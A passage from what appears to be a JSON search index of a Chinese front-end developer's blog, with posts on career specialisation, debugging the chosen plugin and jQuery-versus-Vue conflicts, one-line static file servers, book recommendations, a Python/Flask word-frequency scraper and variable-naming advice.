IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,不过你不清楚这些知识点,你可以随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐一下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档放佛如喝王老吉,消火又滋润。","title":"如何成为从培训班里出来的牛人?"},{"content":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让时长淘汰了一批在ActionScript的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多说认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招在某一方面专家。但是从个人的角度考虑,如果你在专业化的道路钻研的非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿会搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄会慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强时,比你更听话时。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","permalink":"https://wdd.js.org/posts/2019/10/vpqfyr/","summary":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让时长淘汰了一批在ActionScript的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多说认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招在某一方面专家。但是从个人的角度考虑,如果你在专业化的道路钻研的非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿会搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄会慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强时,比你更听话时。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","title":"你不知道的专业化道路"},{"content":"1. 问题1:chosen插件无法显示图标 问题现象在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当它访问到这个页面时。他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?, 为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说的好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。\n当userAge被jQuery改成14时,Vue实例中的userAge任然是12。当你输入userName时,Vue发现数据改变,触发虚拟DOM的重新渲染,同时也将userAge渲染成了12。\n总结:如果你在Vue项目中逼不得已使用jQuery, 你要知道这会导致哪些常见的问题,以及解决思路。\n3. 最后 我苦苦寻找诡异的bug原因,其实是我的无知。\n","permalink":"https://wdd.js.org/posts/2019/10/qmgxqm/","summary":"1. 问题1:chosen插件无法显示图标 问题现象在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当它访问到这个页面时。他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?, 为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说的好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。","title":"我苦苦寻找诡异的bug原因,其实是我的无知"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs\n2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2019/10/hvqggd/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":"1. Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。\n","permalink":"https://wdd.js.org/fe/gitbook-good-book/","summary":"1. Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。","title":"Gitbook好书推荐"},{"content":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheeio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stoodout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.js python版本 sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding=\u0026#39;gb18030\u0026#39;) # 解决控制台中文乱码 USELESSWORDS = [\u0026#39;的\u0026#39;,\u0026#39;要\u0026#39;,\u0026#39;了\u0026#39;,\u0026#39;在\u0026#39;,\u0026#39;和\u0026#39;,\u0026#39;是\u0026#39;,\u0026#39;把\u0026#39;,\u0026#39;向\u0026#39;,\u0026#39;上\u0026#39;,\u0026#39;为\u0026#39;,\u0026#39;等\u0026#39;,\u0026#39;个\u0026#39;] # 标记一些无用的单词 TOP = 30 # 只要前面的30个就可以了 def _remove_punctuation(line): # 移除非中文字符 # rule = re.compile(\u0026#34;[^a-zA-Z0-9\\u4e00-\\u9fa5]\u0026#34;) rule = re.compile(\u0026#34;[^\\u4e00-\\u9fa5]\u0026#34;) line = rule.sub(\u0026#39;\u0026#39;,line) return line def _calculate_frequency(words): # 计算分词出现的次数 result = {} res = [] for word in words: if result.get(word, -1) == -1: result[word] = 1 else: result[word] += 1 for word in result: if _.contains(USELESSWORDS, word): # 排除无用的分词 continue res.append({ \u0026#39;word\u0026#39;: word, \u0026#39;fre\u0026#39;: result[word] }) return _.sortBy(res, \u0026#39;fre\u0026#39;)[::-1][:TOP] # 降序排列 def _get_page(url): # 获取页面 return requests.get(url) def _get_text(req): # 获取文章部分 return pq(req.content)(\u0026#39;#ozoom\u0026#39;).text() def main(url): # 入口函数,函数组合 return _.compose( _get_page, _get_text, _remove_punctuation, _jieba.cut, _calculate_frequency )(url) 6. python服务端:Flask浅入浅出 import word_rank from flask import Flask, request, jsonify, render_template app = Flask(__name__) app.debug = True @app.route(\u0026#39;/rank\u0026#39;) # 从query参数里获取pageUrl,并给分词排序 def getRank(): pageUrl = request.args.get(\u0026#39;pageUrl\u0026#39;) app.logger.debug(pageUrl) rank = word_rank.main(pageUrl) app.logger.debug(rank) return jsonify(rank) @app.route(\u0026#39;/\u0026#39;) # 主页面 def getHome(): return render_template(\u0026#39;home.html\u0026#39;) if __name__ == \u0026#39;__main__\u0026#39;: app.run() 7. 总结 据说有个定律:凡是能用JavaScript写出来的,最终都会用JavaScript写出来。 我是很希望这样啦。但是不得不承认,python上有很多非常优秀的库。这些库在npm上并没有找到合适的替代品。\n所以,我就想: 如何能用nodejs直接调用python的第三方库\n目前的解决方案有两种,第一,只用nodejs的child_processes。这个方案我试过,但是不太好用。\n第二,npm里面有一些包,可以直接调用python的库。例如:node-python, python.js, 但是这些包我在win7上安装的时候总是报错。而且解决方法也蛮麻烦的。索性我就直接用python了。\n最后附上项目地址:https://github.com/wangduanduan/read-newspaper\n","permalink":"https://wdd.js.org/posts/2019/10/rmsqoa/","summary":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheeio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stoodout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.","title":"python实战 报纸分词排序"},{"content":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAcount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5. 使用可搜索的名称 // bad var e = \u0026#39;not found\u0026#39;; // 想搜e, 就很难搜 // good var ERROR_NO_FOUND = \u0026#39;not found\u0026#39;; 6. 方法名一概是动词短语 // good function createAgent(){} funtion deleteAgent(){} function updateAgent(){} function queryAgent(){} 7. 尽量不要用单字母名称, 除了用于循环 // bad var i = 1; // good for(var i=0; i\u0026lt;10; i++){ ... } // very good userList.forEach(function(user){ ... }); 8. 每个概念对应一个词 controller和manager, 没什么区别,要用controller都用controller, 要用manager都用manager, 不要混着用 9. 建立项目词汇表, 不要随意创造名称 user, agent, org, queue, activity, device... 10. 参考资料 《代码整洁之道》 《明朝那些事儿》 ","permalink":"https://wdd.js.org/posts/2019/10/ouvbom/","summary":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var 